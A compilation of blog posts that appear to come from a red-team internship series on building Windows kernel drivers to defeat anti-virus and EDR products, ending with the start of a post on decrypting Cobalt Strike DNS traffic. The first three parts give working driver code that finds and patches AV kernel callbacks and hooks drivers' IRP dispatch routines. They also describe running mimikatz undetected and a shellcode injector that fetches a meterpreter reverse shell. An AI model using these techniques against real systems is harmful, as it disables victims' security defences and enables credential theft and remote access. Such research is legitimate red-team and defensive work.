
Kernel Karnage – Part 1

By: bautersj
21 October 2021 at 15:13

I start the first week of my internship in true spooktober fashion as I dive into a daunting subject that’s been scaring me for some time now: The Windows Kernel.

1. KdPrint(“Hello, world!\n”);

When I finished my previous internship, which was focused on bypassing Endpoint Detection and Response (EDR) software and Anti-Virus (AV) software from a user land point of view, we joked about making the next topic defeating the same defenses, but from kernel land. At that point in time, I had no experience at all with the Windows kernel and it all seemed very advanced and above my level of technical ability. As I write this blogpost, I have to admit it wasn’t as scary or difficult as I thought it would be; C/C++ is still C/C++ and assembly instructions are still headache-inducing, but comprehensible with the right resources and time dedication.

In this first post, I will lay out some of the technical concepts and ideas behind the goal of this internship, as well as reflect on my first steps in successfully bypassing/disabling a reputable Anti-Virus product, but more on that later.

2. BugCheck?

To set this rollercoaster in motion, I highly recommend checking out this post in which I briefly covered User Space (and Kernel Space to a certain extent) and how EDRs interact with them.

User Space vs Kernel Space

In short, the Windows OS roughly consists of 2 layers, User Space and Kernel Space.

User Space or user land contains the Windows Native API (ntdll.dll), the WIN32 subsystem (kernel32.dll, user32.dll, advapi32.dll, ...) and all the user processes and applications. When applications or processes need more privileged access to hardware devices, memory, the CPU, etc., they will use ntdll.dll to talk to the Windows kernel.

The functions contained in ntdll.dll load a number, called the system service number, into the EAX register of the CPU and then execute the syscall instruction (on x64), which starts the transition to kernel mode while jumping to a predefined routine called the system service dispatcher. The system service dispatcher performs a lookup in the System Service Dispatch Table (SSDT) using the number in the EAX register as an index. The code then jumps to the relevant system service and returns to user mode upon completion of execution.

Kernel Space or kernel land is the bottom layer in between User Space and the hardware and consists of a number of different elements. At the heart of Kernel Space we find ntoskrnl.exe or as we’ll call it: the kernel. This executable houses the most critical OS code, like thread scheduling, interrupt and exception dispatching, and various kernel primitives. It also contains the different managers such as the I/O manager and memory manager. Next to the kernel itself, we find device drivers, which are loadable kernel modules. I will mostly be messing around with these, since they run fully in kernel mode. Apart from the kernel itself and the various drivers, Kernel Space also houses the Hardware Abstraction Layer (HAL), win32k.sys, which mainly handles the User Interface (UI), and various system and subsystem processes (Lsass.exe, Winlogon.exe, Services.exe, etc.), but they’re less relevant in relation to EDRs/AVs.

Opposed to User Space, where every process has its own virtual address space, all code running in Kernel Space shares a single common virtual address space. This means that a kernel-mode driver can overwrite or write to memory belonging to other drivers, or even the kernel itself. When this occurs and results in the driver crashing, the entire operating system will crash.

In 2005, with the first x64 edition of Windows XP, Microsoft introduced a new feature called Kernel Patch Protection (KPP), colloquially known as PatchGuard. PatchGuard is responsible for protecting the integrity of the Windows kernel by hashing its critical structures and performing comparisons at random time intervals. When PatchGuard detects a modification, it will immediately bugcheck the system (KeBugCheck(0x109);), resulting in the infamous Blue Screen Of Death (BSOD) with the message “CRITICAL_STRUCTURE_CORRUPTION”.


3. A battle on two fronts

The goal of this internship is to develop a kernel driver that will be able to disable, bypass, mislead, or otherwise hinder EDR/AV software on a target. So what exactly is a driver, and why do we need one?

As stated in the Microsoft Documentation, a driver is a software component that lets the operating system and a device communicate with each other. Most of us are familiar with the term “graphics card driver”; we frequently need to update it to support the latest and greatest games. However, not all drivers are tied to a piece of hardware, there is a separate class of drivers called Software Drivers.

software driver

Software drivers run in kernel mode and are used to access protected data that is only available in kernel mode, from a user mode application. To understand why we need a driver, we have to look back in time and take into consideration how EDR/AV products work or used to work.

Obligatory disclaimer: I am by no means an expert and a lot of the information used to write this blog post comes from sources which may or may not be trustworthy, complete or accurate.

EDR/AV products have adapted and evolved over time with the increased complexity of exploits and attacks. A common way to detect malicious activity is for the EDR/AV to hook the WIN32 API functions in user land and transfer execution to itself. This way when a process or application calls a WIN32 API function, it will pass through the EDR/AV so it can be inspected and either allowed, or terminated. Malware authors bypassed this hooking method by directly using the underlying Windows Native API (ntdll.dll) functions instead, leaving the WIN32 API functions mostly untouched. Naturally, the EDR/AV products adapted, and started hooking the Windows Native API functions. Malware authors have used several methods to circumvent these hooks, using techniques such as direct syscalls, unhooking and more. I recommend checking out A tale of EDR bypass methods by @ShitSecure (S3cur3Th1sSh1t).

When the battle could no longer be fought in user land (since the Windows Native API is the lowest level), it transitioned into kernel land. Instead of hooking the Native API functions, EDR/AV products started patching the System Service Dispatch Table (SSDT). Sound familiar? When execution from ntdll.dll is transitioned to the system service dispatcher, the lookup in the SSDT will yield a memory address belonging to an EDR/AV function instead of the original system service. This practice of patching the SSDT is risky at best, because it affects the entire operating system and if something goes wrong it will result in a crash.

With the introduction of PatchGuard (KPP), Microsoft put an end to patching the SSDT in x64 versions of Windows (x86 is unaffected) and instead introduced a new feature called Kernel Callbacks. A driver can register a callback for a certain action; when this action is performed, the driver will receive either a pre- or post-action notification.

EDR/AV products make heavy use of these callbacks to perform their inspections. A good example would be the PsSetCreateProcessNotifyRoutine() callback:

  1. When a user application wants to spawn a new process, it will call the CreateProcessW() function in kernel32.dll, which will then trigger the create process callback, letting the kernel know a new process is about to be created.
  2. Meanwhile the EDR/AV driver has implemented the PsSetCreateProcessNotifyRoutine() callback and assigned one of its functions (0xFA7F) to that callback.
  3. The kernel registers the EDR/AV driver function address (0xFA7F) in the callback array.
  4. The kernel receives the process creation callback from CreateProcessW() and sends a notification to all the registered drivers in the callback array.
  5. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  6. The EDR/AV driver function (0xFA7F) instructs the EDR/AV application running in user land to inject into the User Application’s virtual address space and hook ntdll.dll to transfer execution to itself.
kernel callback

With EDR/AV products transitioning to kernel space, malware authors had to follow suit and bring their own kernel driver to get back on equal footing. The job of the malicious driver is fairly straightforward: eliminate the kernel callbacks to the EDR/AV driver. So how can this be achieved?

  1. An evil application in user space is aware we want to run Mimikatz.exe, a well known tool to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory.
  2. The evil application instructs the evil driver to disable the EDR/AV product.
  3. The evil driver will first locate and read the callback array and then patch any entries belonging to EDR/AV drivers by replacing the first instruction in their callback function (0xFA7F) with a RET (0xC3) instruction.
  4. Mimikatz.exe can now run and will call ReadProcessMemory(), which will trigger a callback.
  5. The kernel receives the callback and sends a notification to all the registered drivers in the callback array.
  6. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  7. The EDR/AV driver function (0xFA7F) executes the RET (0xC3) instruction and immediately returns.
  8. Execution resumes with ReadProcessMemory(), which will call NtReadVirtualMemory(), which in turn will execute the syscall and transition into kernel mode to read the lsass.exe process memory.
patch kernel callback

4. Don’t reinvent the wheel

Armed with all this knowledge, I set out to put the theory into practice. I stumbled upon Windows Kernel Ps Callback Experiments by @fdiskyou which explains in depth how he wrote his own evil driver and evilcli user application to disable EDR/AV as explained above. To use the project you need Visual Studio 2019 and the latest Windows SDK and WDK.

I also set up two virtual machines configured for remote kernel debugging with WinDbg:

  1. Windows 10 build 19042
  2. Windows 11 build 21996

With the following options enabled:

bcdedit /set TESTSIGNING ON
bcdedit /debug on
bcdedit /dbgsettings serial debugport:2 baudrate:115200
bcdedit /set hypervisorlaunchtype off

To compile and build the driver project, I had to make a few modifications. First the build target should be Debug – x64. Next I converted the current driver into a primitive driver by modifying the evil.inf file to meet the new requirements.

; evil.inf

[Version]
Signature="$WINDOWS NT$"

[DestinationDirs]
DefaultDestDir = 12

[SourceDisksNames]
1 = %DiskName%,,,""

[Strings]
ManufacturerName="<Your manufacturer name>" ;TODO: Replace with your manufacturer name
DiskName="evil Source Disk"

Once the driver was compiled and signed with a test certificate, I installed it on my Windows 10 VM with WinDbg remotely attached. To see kernel debug messages in WinDbg I updated the default mask to 8: kd> ed Kd_Default_Mask 8.

sc create evil type= kernel binPath= C:\Users\Cerbersec\Desktop\driver\evil.sys
sc start evil

evil driver
windbg evil driver

Using the evilcli.exe application with the -l flag, I can list all the registered callback routines from the callback array for process creation and thread creation. When I first tried this I immediately bluescreened with the message “Page Fault in Non-Paged Area”.

5. The mystery of 3 bytes

This BSOD message is telling me I’m trying to access non-committed memory, which is an immediate bugcheck. The reason this happened has to do with Windows versioning and the way we find the callback array in memory.


Locating the callback array in memory by hand is a trivial task and can be done with WinDbg or any other kernel debugger. First we disassemble the PsSetCreateProcessNotifyRoutine() function and look for the first CALL (0xE8) instruction.


Next we disassemble the PspSetCreateProcessNotifyRoutine() function until we find a LEA (0x4C 0x8D 0x2D) (load effective address) instruction.


Then we can inspect the memory address that LEA puts in the r13 register. This is the callback array in memory.

callback array

To view the different drivers in the callback array, we need to perform a bitwise AND of each entry in the callback array with 0xFFFFFFFFFFFFFFF8.

logical and

The driver roughly follows the same method to locate the callback array in memory; by calculating offsets to the instructions we looked for manually, relative to the PsSetCreateProcessNotifyRoutine() function base address, which we obtain using the MmGetSystemRoutineAddress() function.

ULONG64 FindPspCreateProcessNotifyRoutine()
{
	LONG OffsetAddr = 0;
	ULONG64	i = 0;
	ULONG64 pCheckArea = 0;
	UNICODE_STRING unstrFunc;

	RtlInitUnicodeString(&unstrFunc, L"PsSetCreateProcessNotifyRoutine");
	//obtain the PsSetCreateProcessNotifyRoutine() function base address
	pCheckArea = (ULONG64)MmGetSystemRoutineAddress(&unstrFunc);
	KdPrint(("[+] PsSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));

	//scan the first 20 bytes after the base address for the right OPCODE (instruction)
	//we're looking for the 0xE8 OPCODE, which is the CALL instruction
	for (i = pCheckArea; i < pCheckArea + 20; i++) {
		if (*(PUCHAR)i == OPCODE_PSP[g_WindowsIndex]) {
			OffsetAddr = 0;

			//the 4 bytes after the CALL (0xE8) instruction contain the relative offset to the PspSetCreateProcessNotifyRoutine() function address
			memcpy(&OffsetAddr, (PUCHAR)(i + 1), 4);
			pCheckArea = pCheckArea + (i - pCheckArea) + OffsetAddr + 5;
			break;
		}
	}

	KdPrint(("[+] PspSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));

	//scan the first 0xFF bytes of the PspSetCreateProcessNotifyRoutine base address for the right OPCODES (instructions)
	//we're looking for the 0x4C 0x8D 0x2D OPCODES, which is the LEA r13 instruction
	for (i = pCheckArea; i < pCheckArea + 0xff; i++) {
		if (*(PUCHAR)i == OPCODE_LEA_R13_1[g_WindowsIndex] && *(PUCHAR)(i + 1) == OPCODE_LEA_R13_2[g_WindowsIndex] && *(PUCHAR)(i + 2) == OPCODE_LEA_R13_3[g_WindowsIndex]) {
			OffsetAddr = 0;

			//the 4 bytes after the LEA r13 (0x4C 0x8D 0x2D) instruction contain the relative offset to the callback array
			memcpy(&OffsetAddr, (PUCHAR)(i + 3), 4);
			//resolve the absolute address of the callback array (end of the 7-byte LEA instruction + relative offset)
			return OffsetAddr + 7 + i;
		}
	}

	KdPrint(("[+] Returning from CreateProcessNotifyRoutine \n"));
	return 0;
}

The key takeaway here is the OPCODE_*[g_WindowsIndex] construction, where the OPCODE_* arrays are defined as:

UCHAR OPCODE_PSP[]	 = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8 };
//process callbacks
UCHAR OPCODE_LEA_R13_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c };
UCHAR OPCODE_LEA_R13_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_R13_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d };
// thread callbacks
UCHAR OPCODE_LEA_RCX_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48 };
UCHAR OPCODE_LEA_RCX_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_RCX_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d };

And g_WindowsIndex acts as an index based on the Windows build number of the machine (osVersionInfo.dwBuildNumber).

To solve the mystery of the BSOD, I compared debug output with manual calculations and found out that my driver had been looking for the 0x00 OPCODE instead of the 0xE8 (CALL) OPCODE to obtain the base address of the PspSetCreateProcessNotifyRoutine() function. The first 0x00 OPCODE it finds is located at a 3 byte offset from the 0xE8 OPCODE, resulting in an invalid offset being copied by the memcpy() function.

After adjusting the OPCODE array and the function responsible for calculating the index from the Windows build number, the driver worked just fine.

list callback array

6. Driver vs Anti-Virus

To put the driver to the test, I installed it on my Windows 11 VM together with a reputable anti-virus product. After patching the AV driver callback routines in the callback array, mimikatz.exe was successfully executed.

When returning the AV driver callback routines back to their original state, mimikatz.exe was detected and blocked upon execution.

7. Conclusion

We started this first internship post by looking at User vs Kernel Space and how EDRs interact with them. Since the goal of the internship is to develop a kernel driver to hinder EDR/AV software on a target, we have then discussed the concept of kernel drivers and kernel callbacks and how they are used by security software. As a first practical example, we used evilcli, combined with some BSOD debugging to patch the kernel callbacks used by an AV product and have Mimikatz execute undetected.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Kernel Karnage – Part 2 (Back to Basics)

By: bautersj
29 October 2021 at 14:40

This week I try to figure out “what makes a driver a driver?” and experiment with writing my own kernel hooks.

1. Windows Kernel Programming 101

In the first part of this internship blog series, we took a look at how EDRs interact with User and Kernel space, and explored a frequently used feature called Kernel Callbacks by leveraging the Windows Kernel Ps Callback Experiments project by @fdiskyou to patch them in memory. Kernel callbacks are only the first step in a line of defense that modern EDR and AV solutions leverage when deploying kernel drivers to identify malicious activity. To better understand what we’re up against, we need to take a step back and familiarize ourselves with the concept of a driver itself.

To do just that, I spent the vast majority of my time this week reading the fantastic book Windows Kernel Programming by Pavel Yosifovich, which is a great introduction to the Windows kernel and its components and mechanisms, as well as drivers and their anatomy and functions.

In this blogpost I would like to take a closer look at the anatomy of a driver and experiment with a different technique called IRP MajorFunction hooking.

2. Anatomy of a driver

Most of us are familiar with the classic C/C++ projects and their characteristics; for example, the int main(int argc, char* argv[]){ return 0; } function, which is the typical entry point of a C++ console application. So, what makes a driver a driver?

Just like a C++ console application, a driver requires an entry point as well. This entry point comes in the form of a DriverEntry() function with the prototype:

NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STRING RegistryPath);

The DriverEntry() function is responsible for 2 major tasks:

  1. setting up the driver’s DeviceObject and associated symbolic link
  2. setting up the dispatch routines

Every driver needs an “endpoint” that other applications can use to communicate with. This comes in the form of a DeviceObject, an instance of the DEVICE_OBJECT structure. The DeviceObject is abstracted in the form of a symbolic link and registered in the Object Manager’s GLOBAL?? directory (use sysinternal’s WinObj tool to view the Object Manager). User mode applications can use functions like NtCreateFile with the symbolic link as a handle to talk to the driver.


Example of a C++ application using CreateFile to talk to a driver registered as “Interceptor” (hint: it’s my driver 😉 ):

HANDLE hDevice = CreateFile(L"\\\\.\\Interceptor", GENERIC_WRITE | GENERIC_READ, 0, nullptr, OPEN_EXISTING, 0, nullptr);

Once the driver’s endpoint is configured, the DriverEntry() function needs to sort out what to do with incoming communications from user mode and other operations such as unloading itself. To do this, it uses the DriverObject to register Dispatch Routines, or functions associated with a particular driver operation.

The DriverObject contains an array, holding function pointers, called the MajorFunction array. This array determines which particular operations are supported by the driver, such as Create, Read, Write, etc. The index of the MajorFunction array is controlled by Major Function codes, defined by their IRP_MJ_ prefix.

There are 3 main Major Function codes, alongside the DriverUnload operation, which need to be initialized for the driver to function properly:

// prototypes
void InterceptUnload(PDRIVER_OBJECT);
NTSTATUS InterceptCreateClose(PDEVICE_OBJECT, PIRP);
NTSTATUS InterceptDeviceControl(PDEVICE_OBJECT, PIRP);

extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    DriverObject->DriverUnload = InterceptUnload;
    DriverObject->MajorFunction[IRP_MJ_CREATE] = InterceptCreateClose;
    DriverObject->MajorFunction[IRP_MJ_CLOSE] =  InterceptCreateClose;
    DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = InterceptDeviceControl;
    //... DeviceObject and symbolic link creation omitted
    return STATUS_SUCCESS;
}

The DriverObject->DriverUnload dispatch routine is responsible for cleaning up and preventing any memory leaks before the driver unloads; a leak in the kernel will persist until the machine is rebooted. The IRP_MJ_CREATE and IRP_MJ_CLOSE Major Functions handle CreateFile() and CloseHandle() calls. Without them, handles to the driver couldn’t be created or destroyed, rendering the driver unusable. Finally, the IRP_MJ_DEVICE_CONTROL Major Function is in charge of I/O operations/communications.

A typical driver communicates by receiving requests, handling those requests or forwarding them to the appropriate device in the device stack (out of scope for this blogpost). These requests come in the form of an I/O Request Packet or IRP, which is a semi-documented structure, accompanied by one or more IO_STACK_LOCATION structures, located in memory directly following the IRP. Each IO_STACK_LOCATION is related to a device in the device stack and the driver can call the IoGetCurrentIrpStackLocation() function to retrieve the IO_STACK_LOCATION related to itself.

The previously mentioned dispatch routines determine how these IRPs are handled by the driver. We are interested in the IRP_MJ_DEVICE_CONTROL dispatch routine, which corresponds to the DeviceIoControl() call from user mode or ZwDeviceIoControlFile() call from kernel mode. An IRP request destined for IRP_MJ_DEVICE_CONTROL contains two user buffers, one for reading and one for writing, as well as a control code indicated by the IOCTL_ prefix. These control codes are defined by the driver developer and indicate the supported actions.

Control codes are built using the CTL_CODE macro, defined as:

#define CTL_CODE(DeviceType, Function, Method, Access) (((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method))

Example for my Interceptor driver:


3. Kernel land hooks

Now that we have a vague idea how drivers communicate with other drivers and applications, we can think about ways to intercept those communications. One of these techniques is called IRP MajorFunction hooking.

hook MFA

Since drivers and all other kernel processes share the same memory, we can also access and overwrite that memory as long as we don’t upset PatchGuard by modifying critical structures. I wrote a driver called Interceptor, which does exactly that. It locates the target driver’s DriverObject and retrieves its MajorFunction array (MFA). This is done using the undocumented ObReferenceObjectByName() function, which uses the driver device name to get a pointer to the DriverObject.

UNICODE_STRING targetDriverName = RTL_CONSTANT_STRING(L"\\Driver\\Disk");
PDRIVER_OBJECT DriverObject = nullptr;

status = ObReferenceObjectByName(&targetDriverName, OBJ_CASE_INSENSITIVE, nullptr, 0, *IoDriverObjectType, KernelMode, nullptr, (PVOID*)&DriverObject);

if (!NT_SUCCESS(status)) {
	KdPrint((DRIVER_PREFIX "failed to obtain DriverObject (0x%08X)\n", status));
	return status;
}
Once it has obtained the MFA, it will iterate over all the Dispatch Routines (IRP_MJ_) and replace the pointers, which are pointing to the target driver’s functions (0x1000 – 0x1003), with my own pointers, pointing to the *InterceptHook functions (0x2000 – 0x2003), controlled by the Interceptor driver.

for (int i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++) {
    //save the original pointer in case we need to restore it later
	globals.originalDispatchFunctionArray[i] = DriverObject->MajorFunction[i];
    //replace the pointer with our own pointer
	DriverObject->MajorFunction[i] = &GenericHook;
}

As an example, I hooked the disk driver’s IRP_MJ_DEVICE_CONTROL dispatch routine and intercepted the calls:

Hooked IRP Disk Driver

This method can be used to intercept communications to any driver but is fairly easy to detect. A driver controlled by EDR/AV could iterate over its own MajorFunction array and check the function pointer’s address to see if it is located in its own address range. If the function pointer is located outside its own address range, that means the dispatch routine was hooked.

4. Conclusion

To defeat EDRs in kernel space, it is important to know what goes on at the core, namely the driver. In this blogpost we examined the anatomy of a driver, its functions, and their main responsibilities. We established that a driver needs to communicate with other drivers and applications in user space, which it does via dispatch routines registered in the driver’s MajorFunction array.

We then briefly looked at how we can intercept these communications by using a technique called IRP MajorFunction hooking, which patches the target driver’s dispatch routines in memory with pointers to our own functions, so we can inspect or redirect traffic.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Kernel Karnage – Part 3 (Challenge Accepted)

By: bautersj
16 November 2021 at 08:28

While I was cruising along, taking in the views of the kernel landscape, I received a challenge …

1. Player 2 has entered the game

The past weeks I mostly experimented with existing tooling and got acquainted with the basics of kernel driver development. I managed to get a quick win versus $vendor1 but that didn’t impress our blue team, so I received a challenge to bypass $vendor2. I have to admit, after trying all week to get around the protections, $vendor2 is definitely a bigger beast to tame.

I foolishly tried to rely on blocking the kernel callbacks using the Evil driver from my first post and quickly concluded that wasn’t going to cut it. To win this fight, I needed bigger guns.

2. Know your enemy

$vendor2’s defenses consist of a number of driver modules:

  • eamonm.sys (monitoring agent?)
  • edevmon.sys (device monitor?)
  • eelam.sys (early launch anti-malware driver)
  • ehdrv.sys (helper driver?)
  • ekbdflt.sys (keyboard filter?)
  • epfw.sys (personal firewall driver?)
  • epfwlwf.sys (personal firewall light-weight filter?)
  • epfwwfp.sys (personal firewall filter?)

and a user mode service: ekrn.exe ($vendor2 kernel service) running as a System Protected Process (enabled by eelam.sys driver).

At this stage I am only guessing the roles and functionality of the different driver modules based on their names and some behaviour I have observed during various tests, mainly because I haven’t done any reverse-engineering yet. Since I am interested in running malicious binaries on the protected system, my initial attack vector is to disable the functionality of the ehdrv.sys, epfw.sys and epfwwfp.sys drivers. As far as I can tell using WinObj and listing all loaded modules in WinDbg (lm command), epfwlwf.sys does not appear to be running and neither does eelam.sys, which I presume is only used in the initial stages when the system is booting up to start ekrn.exe as a System Protected Process.

WinObj GLOBAL?? directory listing

In the context of my internship being focused on the kernel, I have not (yet) considered attacking the protected ekrn.exe service. According to the Microsoft Documentation, a protected process is shielded from code injection and other attacks from admin processes. However, a quick Google search tells me otherwise 😉

3. Interceptor

With my eye on the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, I noticed they all have registered callbacks, either for process creation, thread creation, or both. I’m still working on expanding my own driver to include callback functionality, including image load callbacks, which are used to detect the loading of drivers and so on. Luckily, the Evil driver has got this angle (partially) covered for now.

ESET registered callbacks

Unfortunately, we cannot solely rely on blocking kernel callbacks. Other sources contacting the $vendor2 drivers and reporting suspicious activity should also be taken into consideration. In my previous post I briefly touched on IRP MajorFunction hooking, which is a good (although easy to detect) way of intercepting communications between drivers and other applications.

I wrote my own driver called Interceptor, which combines the ideas of @zodiacon’s Driver Monitor project and @fdiskyou’s Evil driver.

To gather information about all the loaded drivers on the system, I used the AuxKlibQueryModuleInformation() function. Note that because I return output via pass-by-reference parameters, the calling function is responsible for cleaning up any allocated memory and preventing a leak.

NTSTATUS ListDrivers(PAUX_MODULE_EXTENDED_INFO& outModules, ULONG& outNumberOfModules) {
    NTSTATUS status;
    ULONG modulesSize = 0;
    ULONG numberOfModules;
    AUX_MODULE_EXTENDED_INFO* modules = nullptr;

    status = AuxKlibInitialize();
    if (!NT_SUCCESS(status))
        return status;

    //first call with a null buffer to retrieve the required buffer size
    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), nullptr);
    if (!NT_SUCCESS(status) || modulesSize == 0)
        return status;

    numberOfModules = modulesSize / sizeof(AUX_MODULE_EXTENDED_INFO);

    modules = (AUX_MODULE_EXTENDED_INFO*)ExAllocatePoolWithTag(PagedPool, modulesSize, DRIVER_TAG);
    if (modules == nullptr)
        return STATUS_INSUFFICIENT_RESOURCES;

    RtlZeroMemory(modules, modulesSize);

    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), modules);
    if (!NT_SUCCESS(status)) {
        ExFreePoolWithTag(modules, DRIVER_TAG);
        return status;
    }

    //calling function is responsible for cleanup:
    //ExFreePoolWithTag(modules, DRIVER_TAG);

    outModules = modules;
    outNumberOfModules = numberOfModules;

    return status;
}
Using this function, I can obtain information like the driver’s full path, its file name on disk and its image base address. This information is then passed on to the user mode application (InterceptorCLI.exe) or used to locate the driver’s DriverObject and MajorFunction array so it can be hooked.

To hook the driver’s dispatch routines, I still rely on the ObReferenceObjectByName() function, which accepts a UNICODE_STRING parameter containing the driver’s name in the format \Driver\DriverName. In this case, the driver’s name is derived from the driver’s file name on disk: mydriver.sys -> \Driver\mydriver.

However, it should be noted that this is not a reliable way to obtain a handle to the DriverObject, since the driver’s name can be set to anything in the driver’s DriverEntry() function when it creates the DeviceObject and symbolic link.

Once a handle is obtained, the target driver will be stored in a global array and its dispatch routines hooked and replaced with my InterceptGenericDispatch() function. The target driver’s DriverObject->DriverUnload dispatch routine is separately hooked and replaced by my GenericDriverUnload() function, to prevent the target driver from unloading itself without us knowing about it and causing a nightmare with dangling pointers.

NTSTATUS InterceptGenericDispatch(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
    auto stack = IoGetCurrentIrpStackLocation(Irp);
    auto status = STATUS_UNSUCCESSFUL;
    KdPrint((DRIVER_PREFIX "GenericDispatch: call intercepted\n"));

    //inspect IRP
    if (isTargetIrp(Irp)) {
        //modify IRP
        status = ModifyIrp(Irp);
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    else if (isDiscardIrp(Irp)) {
        //call own completion routine
        return CompleteRequest(Irp, status, 0);
    }
    else {
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    return CompleteRequest(Irp, status, 0);
}
void GenericDriverUnload(PDRIVER_OBJECT DriverObject) {
    for (int i = 0; i < MaxIntercept; i++) {
        if (globals.Drivers[i].DriverObject == DriverObject) {
            if (globals.Drivers[i].DriverUnload) {
                //forward the call to the original unload routine
                globals.Drivers[i].DriverUnload(DriverObject);
            }
            //free the slot so no dangling pointers remain
            globals.Drivers[i].DriverObject = nullptr;
        }
    }
}
4. Early bird gets the worm

Armed with my new Interceptor driver, I set out to try and defeat $vendor2 once more. Alas, no luck, mimikatz.exe was still detected and blocked. This got me thinking, running such a well-known malicious binary without any attempts to hide it or obfuscate it is probably not realistic in the first place. A signature check alone would flag the binary as malicious. So, I decided to write my own payload injector for testing purposes.

Based on research presented in An Empirical Assessment of Endpoint Detection and Response Systems against Advanced Persistent Threats Attack Vectors by George Karantzas and Constantinos Patsakis, I opted for a shellcode injector using:
– the EarlyBird code injection technique
– PPID spoofing
– Microsoft’s Code Integrity Guard (CIG) enabled to prevent non-Microsoft DLLs from being injected into our process
– Direct system calls to bypass any user mode hooks.

The injector delivers shellcode to fetch a “windows/x64/meterpreter/reverse_tcp” payload from the Metasploit framework.

Using my shellcode injector, combined with the Evil driver to disable kernel callbacks and my Interceptor driver to intercept any IRPs to the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, the meterpreter payload is still detected but not blocked by $vendor2.

5. Conclusion

In this blogpost, we took a look at a more advanced Anti-Virus product, consisting of multiple kernel modules and better detection capabilities in both user mode and kernel mode. We took note of the different AV kernel drivers that are loaded and the callbacks they subscribe to. We then combined the Evil driver and the Interceptor driver to disable the kernel callbacks and hook the IRP dispatch routines, before executing a custom shellcode injector to fetch a meterpreter reverse shell payload.

Even when armed with a malicious kernel driver, a good EDR/AV product can still be a major hurdle to bypass. Combining techniques in both kernel and user land is the most effective solution, although it might not be the most realistic. With the current approach, the Evil driver does not (yet) take into account image load, registry and object creation callbacks, nor are the AV minifilters addressed.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Cobalt Strike: Decrypting DNS Traffic – Part 5

29 November 2021 at 11:14

Cobalt Strike beacons can communicate over DNS. We show how to decode and decrypt DNS traffic in this blog post.

This series of blog posts describes different methods to decrypt Cobalt Strike traffic. In part 1 of this series, we revealed private encryption keys found in rogue Cobalt Strike packages. In part 2, we decrypted Cobalt Strike traffic starting with a private RSA key. In part 3, we explain how to decrypt Cobalt Strike traffic if you don’t know the private RSA key but do have a process memory dump. And in part 4, we deal with traffic obfuscated with malleable C2 data transforms.

In the first 4 parts of this series, we have always looked at traffic over HTTP (or HTTPS). A beacon can also be configured to communicate over DNS, by performing DNS requests for A, AAAA and/or TXT records. Data flowing from the beacon to the team server is encoded with hexadecimal digits that make up labels of the queried name, and data flowing from the team server to the beacon is contained in the answers of A, AAAA and/or TXT records.

The data needs to be extracted from DNS queries, and then it can be decrypted (with the same cryptographic methods as for traffic over HTTP).

DNS C2 protocol

